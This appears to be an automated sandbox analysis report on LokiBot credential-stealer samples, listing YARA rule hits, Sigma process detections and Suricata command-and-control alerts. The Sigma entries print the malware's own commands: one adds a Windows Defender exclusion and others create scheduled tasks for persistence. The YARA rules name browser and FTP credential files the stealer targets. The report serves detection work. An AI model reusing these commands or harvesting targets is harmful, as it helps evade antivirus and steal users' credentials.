10.2.HxQXdrrQ.exe.39346e8.4.raw.unpack	Windows_Trojan_Lokibot_0f421617	unknown	unknown	0x47bb:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
10.2.HxQXdrrQ.exe.394e708.3.raw.unpack	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
10.2.HxQXdrrQ.exe.394e708.3.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
10.2.HxQXdrrQ.exe.39346e8.4.raw.unpack	Loki_1	Loki Payload	kevoreilly	0x13db4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW 0x13ffc:$a2: last_compatible_version
10.2.HxQXdrrQ.exe.39346e8.4.raw.unpack	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x12fff:$des3: 68 03 66 00 00 0x173f0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x174bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
10.2.HxQXdrrQ.exe.39346e8.4.raw.unpack	INDICATOR_SUSPICIOUS_GENInfoStealer	Detects executables containing common artifcats observed in infostealers	ditekSHen	0x16536:$f1: FileZilla\recentservers.xml 0x16576:$f2: FileZilla\sitemanager.xml 0x147e6:$b2: Mozilla\Firefox\Profiles 0x14550:$b3: Software\Microsoft\Internet Explorer\IntelliForms\Storage2 0x146fa:$s4: logins.json 0x155a4:$s6: wand.dat 0x14024:$a1: username_value 0x14014:$a2: password_value 0x1465f:$a3: encryptedUsername 0x146cc:$a3: encryptedUsername 0x14672:$a4: encryptedPassword 0x146e0:$a4: encryptedPassword
15.2.HxQXdrrQ.exe.400000.0.unpack	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
15.2.HxQXdrrQ.exe.400000.0.unpack	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
10.2.HxQXdrrQ.exe.394e708.3.raw.unpack	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x173f0:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
10.2.HxQXdrrQ.exe.394e708.3.raw.unpack	Windows_Trojan_Lokibot_0f421617	unknown	unknown	0x47bb:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
15.2.HxQXdrrQ.exe.400000.0.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
10.2.HxQXdrrQ.exe.394e708.3.raw.unpack	Loki_1	Loki Payload	kevoreilly	0x13db4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW 0x13ffc:$a2: last_compatible_version
10.2.HxQXdrrQ.exe.394e708.3.raw.unpack	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x12fff:$des3: 68 03 66 00 00 0x173f0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x174bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
15.2.HxQXdrrQ.exe.400000.0.unpack	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x173f0:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
15.2.HxQXdrrQ.exe.400000.0.unpack	Windows_Trojan_Lokibot_0f421617	unknown	unknown	0x47bb:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
10.2.HxQXdrrQ.exe.394e708.3.raw.unpack	INDICATOR_SUSPICIOUS_GENInfoStealer	Detects executables containing common artifcats observed in infostealers	ditekSHen	0x16536:$f1: FileZilla\recentservers.xml 0x16576:$f2: FileZilla\sitemanager.xml 0x147e6:$b2: Mozilla\Firefox\Profiles 0x14550:$b3: Software\Microsoft\Internet Explorer\IntelliForms\Storage2 0x146fa:$s4: logins.json 0x155a4:$s6: wand.dat 0x14024:$a1: username_value 0x14014:$a2: password_value 0x1465f:$a3: encryptedUsername 0x146cc:$a3: encryptedUsername 0x14672:$a4: encryptedPassword 0x146e0:$a4: encryptedPassword
15.2.HxQXdrrQ.exe.400000.0.unpack	Loki_1	Loki Payload	kevoreilly	0x13db4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW 0x13ffc:$a2: last_compatible_version
15.2.HxQXdrrQ.exe.400000.0.unpack	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x12fff:$des3: 68 03 66 00 00 0x173f0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x174bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
15.2.HxQXdrrQ.exe.400000.0.unpack	INDICATOR_SUSPICIOUS_GENInfoStealer	Detects executables containing common artifcats observed in infostealers	ditekSHen	0x16536:$f1: FileZilla\recentservers.xml 0x16576:$f2: FileZilla\sitemanager.xml 0x147e6:$b2: Mozilla\Firefox\Profiles 0x14550:$b3: Software\Microsoft\Internet Explorer\IntelliForms\Storage2 0x146fa:$s4: logins.json 0x155a4:$s6: wand.dat 0x14024:$a1: username_value 0x14014:$a2: password_value 0x1465f:$a3: encryptedUsername 0x146cc:$a3: encryptedUsername 0x14672:$a4: encryptedPassword 0x146e0:$a4: encryptedPassword
0.2.YvVDV4cbjy.exe.40141d0.2.unpack	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
0.2.YvVDV4cbjy.exe.40141d0.2.unpack	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x15ff0:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
0.2.YvVDV4cbjy.exe.40141d0.2.unpack	Windows_Trojan_Lokibot_0f421617	unknown	unknown	0x3bbb:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
0.2.YvVDV4cbjy.exe.40141d0.2.unpack	Loki_1	Loki Payload	kevoreilly	0x131b4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW 0x133fc:$a2: last_compatible_version
0.2.YvVDV4cbjy.exe.40141d0.2.unpack	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x123ff:$des3: 68 03 66 00 00 0x15ff0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x160bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
15.2.HxQXdrrQ.exe.400000.0.raw.unpack	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
15.2.HxQXdrrQ.exe.400000.0.raw.unpack	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
15.2.HxQXdrrQ.exe.400000.0.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
15.2.HxQXdrrQ.exe.400000.0.raw.unpack	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x187f0:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
15.2.HxQXdrrQ.exe.400000.0.raw.unpack	Windows_Trojan_Lokibot_0f421617	unknown	unknown	0x53bb:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
15.2.HxQXdrrQ.exe.400000.0.raw.unpack	Loki_1	Loki Payload	kevoreilly	0x151b4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW 0x153fc:$a2: last_compatible_version
15.2.HxQXdrrQ.exe.400000.0.raw.unpack	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x13bff:$des3: 68 03 66 00 00 0x187f0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x188bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
15.2.HxQXdrrQ.exe.400000.0.raw.unpack	INDICATOR_SUSPICIOUS_GENInfoStealer	Detects executables containing common artifcats observed in infostealers	ditekSHen	0x17936:$f1: FileZilla\recentservers.xml 0x17976:$f2: FileZilla\sitemanager.xml 0x15be6:$b2: Mozilla\Firefox\Profiles 0x15950:$b3: Software\Microsoft\Internet Explorer\IntelliForms\Storage2 0x15afa:$s4: logins.json 0x169a4:$s6: wand.dat 0x15424:$a1: username_value 0x15414:$a2: password_value 0x15a5f:$a3: encryptedUsername 0x15acc:$a3: encryptedUsername 0x15a72:$a4: encryptedPassword 0x15ae0:$a4: encryptedPassword
Click to see the 63 entries

Sigma Signatures

System Summary

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\YvVDV4cbjy.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\YvVDV4cbjy.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\YvVDV4cbjy.exe", ParentImage: C:\Users\user\Desktop\YvVDV4cbjy.exe, ParentProcessId: 736, ParentProcessName: YvVDV4cbjy.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\YvVDV4cbjy.exe", ProcessId: 5768, ProcessName: powershell.exe

Sigma detected: Powershell Defender Exclusion

Source: Process started

Sigma detected: Suspicious Add Scheduled Task Parent

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\HxQXdrrQ" /XML "C:\Users\user\AppData\Local\Temp\tmp31BF.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\HxQXdrrQ" /XML "C:\Users\user\AppData\Local\Temp\tmp31BF.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: C:\Users\user\AppData\Roaming\HxQXdrrQ.exe, ParentImage: C:\Users\user\AppData\Roaming\HxQXdrrQ.exe, ParentProcessId: 1632, ParentProcessName: HxQXdrrQ.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\HxQXdrrQ" /XML "C:\Users\user\AppData\Local\Temp\tmp31BF.tmp", ProcessId: 2940, ProcessName: schtasks.exe

Sigma detected: Suspicious Schtasks From Env Var Folder

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\HxQXdrrQ" /XML "C:\Users\user\AppData\Local\Temp\tmp1DE9.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\HxQXdrrQ" /XML "C:\Users\user\AppData\Local\Temp\tmp1DE9.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\YvVDV4cbjy.exe", ParentImage: C:\Users\user\Desktop\YvVDV4cbjy.exe, ParentProcessId: 736, ParentProcessName: YvVDV4cbjy.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\HxQXdrrQ" /XML "C:\Users\user\AppData\Local\Temp\tmp1DE9.tmp", ProcessId: 1196, ProcessName: schtasks.exe

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\YvVDV4cbjy.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\YvVDV4cbjy.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\YvVDV4cbjy.exe", ParentImage: C:\Users\user\Desktop\YvVDV4cbjy.exe, ParentProcessId: 736, ParentProcessName: YvVDV4cbjy.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\YvVDV4cbjy.exe", ProcessId: 5768, ProcessName: powershell.exe

Persistence and Installation Behavior

Sigma detected: Scheduled temp file as task from temp location

Source: Process started

Author: Joe Security: Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\HxQXdrrQ" /XML "C:\Users\user\AppData\Local\Temp\tmp1DE9.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\HxQXdrrQ" /XML "C:\Users\user\AppData\Local\Temp\tmp1DE9.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\YvVDV4cbjy.exe", ParentImage: C:\Users\user\Desktop\YvVDV4cbjy.exe, ParentProcessId: 736, ParentProcessName: YvVDV4cbjy.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\HxQXdrrQ" /XML "C:\Users\user\AppData\Local\Temp\tmp1DE9.tmp", ProcessId: 1196, ProcessName: schtasks.exe

Suricata Signatures

ET MALWARE LokiBot Application/Credential Data Exfiltration Detected M1

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-11T07:44:26.317949+0100	2024312	1	A Network Trojan was detected	192.168.2.5	49707	94.156.177.41	80	TCP
2025-01-11T07:44:27.217417+0100	2024312	1	A Network Trojan was detected	192.168.2.5	49708	94.156.177.41	80	TCP

ET MALWARE LokiBot Checkin

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-11T07:44:25.599550+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	49707	94.156.177.41	80	TCP
2025-01-11T07:44:26.514901+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	49708	94.156.177.41	80	TCP
2025-01-11T07:44:27.307244+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	49709	94.156.177.41	80	TCP
2025-01-11T07:44:28.191011+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	49711	94.156.177.41	80	TCP
2025-01-11T07:44:29.096261+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	49713	94.156.177.41	80	TCP
2025-01-11T07:44:30.130805+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	49714	94.156.177.41	80	TCP
2025-01-11T07:44:31.013403+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	49715	94.156.177.41	80	TCP
2025-01-11T07:44:32.794115+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	49716	94.156.177.41	80	TCP
2025-01-11T07:44:33.799410+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	49717	94.156.177.41	80	TCP
2025-01-11T07:44:34.671202+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	49718	94.156.177.41	80	TCP
2025-01-11T07:44:35.543288+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	49719	94.156.177.41	80	TCP
2025-01-11T07:44:36.441284+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	49720	94.156.177.41	80	TCP
2025-01-11T07:44:37.566875+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	49721	94.156.177.41	80	TCP
2025-01-11T07:44:38.454563+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	49722	94.156.177.41	80	TCP
2025-01-11T07:44:39.345173+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	49724	94.156.177.41	80	TCP
2025-01-11T07:44:40.457078+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	49725	94.156.177.41	80	TCP
2025-01-11T07:44:41.331671+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	49730	94.156.177.41	80	TCP
2025-01-11T07:44:42.253637+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	49738	94.156.177.41	80	TCP
2025-01-11T07:44:43.098513+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	49743	94.156.177.41	80	TCP
2025-01-11T07:44:43.980050+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	49749	94.156.177.41	80	TCP
2025-01-11T07:44:44.852549+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	49755	94.156.177.41	80	TCP
2025-01-11T07:44:45.728633+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	49761	94.156.177.41	80	TCP
2025-01-11T07:44:46.611946+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	49771	94.156.177.41	80	TCP
2025-01-11T07:44:47.470301+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	49777	94.156.177.41	80	TCP
2025-01-11T07:44:48.343700+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	49784	94.156.177.41	80	TCP
2025-01-11T07:44:49.359567+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	49790	94.156.177.41	80	TCP
2025-01-11T07:44:50.222647+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	49796	94.156.177.41	80	TCP
2025-01-11T07:44:51.232327+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	49804	94.156.177.41	80	TCP
2025-01-11T07:44:52.093577+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	49811	94.156.177.41	80	TCP
2025-01-11T07:44:52.995437+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	49816	94.156.177.41	80	TCP
2025-01-11T07:44:53.931455+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	49821	94.156.177.41	80	TCP
2025-01-11T07:44:54.835228+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	49826	94.156.177.41	80	TCP
2025-01-11T07:44:55.697158+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	49834	94.156.177.41	80	TCP
2025-01-11T07:44:56.576534+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	49840	94.156.177.41	80	TCP
2025-01-11T07:44:57.442816+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	49849	94.156.177.41	80	TCP
2025-01-11T07:44:58.295544+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	49855	94.156.177.41	80	TCP
2025-01-11T07:44:59.483479+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	49862	94.156.177.41	80	TCP
2025-01-11T07:45:00.369812+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	49869	94.156.177.41	80	TCP
2025-01-11T07:45:01.246794+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	49878	94.156.177.41	80	TCP
2025-01-11T07:45:02.314357+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	49884	94.156.177.41	80	TCP
2025-01-11T07:45:03.331453+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	49891	94.156.177.41	80	TCP
2025-01-11T07:45:04.209206+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	49899	94.156.177.41	80	TCP
2025-01-11T07:45:05.082273+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	49905	94.156.177.41	80	TCP
2025-01-11T07:45:05.957442+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	49911	94.156.177.41	80	TCP
2025-01-11T07:45:07.173718+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	49919	94.156.177.41	80	TCP
2025-01-11T07:45:08.037685+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	49928	94.156.177.41	80	TCP
2025-01-11T07:45:08.914118+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	49934	94.156.177.41	80	TCP
2025-01-11T07:45:09.933380+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	49939	94.156.177.41	80	TCP
2025-01-11T07:45:10.851770+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	49945	94.156.177.41	80	TCP
2025-01-11T07:45:11.717555+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	49953	94.156.177.41	80	TCP
2025-01-11T07:45:12.578126+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	49961	94.156.177.41	80	TCP
2025-01-11T07:45:13.478552+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	49968	94.156.177.41	80	TCP
2025-01-11T07:45:14.340906+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	49974	94.156.177.41	80	TCP
2025-01-11T07:45:15.208568+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	49980	94.156.177.41	80	TCP
2025-01-11T07:45:16.076063+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	49986	94.156.177.41	80	TCP
2025-01-11T07:45:16.950781+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	49993	94.156.177.41	80	TCP
2025-01-11T07:45:17.828451+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	50002	94.156.177.41	80	TCP
2025-01-11T07:45:18.943087+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	50010	94.156.177.41	80	TCP
2025-01-11T07:45:19.816581+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	50016	94.156.177.41	80	TCP
2025-01-11T07:45:20.695534+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	50022	94.156.177.41	80	TCP
2025-01-11T07:45:21.906791+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	50027	94.156.177.41	80	TCP
2025-01-11T07:45:22.801196+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	50037	94.156.177.41	80	TCP
2025-01-11T07:45:23.654933+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	50043	94.156.177.41	80	TCP
2025-01-11T07:45:24.666068+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	50044	94.156.177.41	80	TCP
2025-01-11T07:45:25.549065+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	50045	94.156.177.41	80	TCP
2025-01-11T07:45:26.431338+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	50046	94.156.177.41	80	TCP
2025-01-11T07:45:27.499770+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	50047	94.156.177.41	80	TCP
2025-01-11T07:45:28.375675+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	50048	94.156.177.41	80	TCP
2025-01-11T07:45:29.280517+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	50049	94.156.177.41	80	TCP
2025-01-11T07:45:30.122846+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	50050	94.156.177.41	80	TCP
2025-01-11T07:45:30.991478+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	50051	94.156.177.41	80	TCP
2025-01-11T07:45:31.859651+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	50052	94.156.177.41	80	TCP
2025-01-11T07:45:32.741029+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	50053	94.156.177.41	80	TCP
2025-01-11T07:45:33.607086+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	50054	94.156.177.41	80	TCP
2025-01-11T07:45:34.487775+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	50055	94.156.177.41	80	TCP
2025-01-11T07:45:35.345550+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	50056	94.156.177.41	80	TCP
2025-01-11T07:45:36.525051+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	50057	94.156.177.41	80	TCP
2025-01-11T07:45:37.400062+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	50058	94.156.177.41	80	TCP
2025-01-11T07:45:38.410807+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	50059	94.156.177.41	80	TCP
2025-01-11T07:45:39.302388+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	50060	94.156.177.41	80	TCP
2025-01-11T07:45:40.165796+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	50061	94.156.177.41	80	TCP
2025-01-11T07:45:41.015055+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	50062	94.156.177.41	80	TCP
2025-01-11T07:45:42.032602+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	50063	94.156.177.41	80	TCP
2025-01-11T07:45:42.904942+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	50064	94.156.177.41	80	TCP
2025-01-11T07:45:43.761690+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	50065	94.156.177.41	80	TCP
2025-01-11T07:45:44.721124+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	50066	94.156.177.41	80	TCP
2025-01-11T07:45:45.593770+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	50067	94.156.177.41	80	TCP
2025-01-11T07:45:46.450873+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	50068	94.156.177.41	80	TCP
2025-01-11T07:45:47.341627+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	50069	94.156.177.41	80	TCP
2025-01-11T07:45:48.223334+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	50070	94.156.177.41	80	TCP
2025-01-11T07:45:49.103767+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	50071	94.156.177.41	80	TCP
2025-01-11T07:45:49.999889+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	50072	94.156.177.41	80	TCP
2025-01-11T07:45:50.897746+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	50073	94.156.177.41	80	TCP
2025-01-11T07:45:51.767772+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	50074	94.156.177.41	80	TCP
2025-01-11T07:45:52.610435+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	50075	94.156.177.41	80	TCP
2025-01-11T07:45:53.849528+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	50076	94.156.177.41	80	TCP
2025-01-11T07:45:54.733799+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	50077	94.156.177.41	80	TCP
2025-01-11T07:45:55.638595+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	50078	94.156.177.41	80	TCP
2025-01-11T07:45:56.514453+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	50079	94.156.177.41	80	TCP
2025-01-11T07:45:57.364760+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	50080	94.156.177.41	80	TCP
2025-01-11T07:45:58.382542+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	50081	94.156.177.41	80	TCP
2025-01-11T07:45:59.299658+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	50082	94.156.177.41	80	TCP
2025-01-11T07:46:00.145771+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	50083	94.156.177.41	80	TCP
2025-01-11T07:46:00.982126+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	50084	94.156.177.41	80	TCP
2025-01-11T07:46:01.873444+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	50085	94.156.177.41	80	TCP
2025-01-11T07:46:02.873702+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	50086	94.156.177.41	80	TCP
2025-01-11T07:46:03.722760+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	50087	94.156.177.41	80	TCP
2025-01-11T07:46:04.607701+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	50088	94.156.177.41	80	TCP
2025-01-11T07:46:05.489996+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	50089	94.156.177.41	80	TCP
2025-01-11T07:46:06.353603+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	50090	94.156.177.41	80	TCP
2025-01-11T07:46:07.255437+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	50091	94.156.177.41	80	TCP
2025-01-11T07:46:08.138322+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	50092	94.156.177.41	80	TCP
2025-01-11T07:46:09.033339+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	50093	94.156.177.41	80	TCP
2025-01-11T07:46:09.910608+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	50094	94.156.177.41	80	TCP
2025-01-11T07:46:10.798044+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	50095	94.156.177.41	80	TCP
2025-01-11T07:46:11.690985+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	50096	94.156.177.41	80	TCP
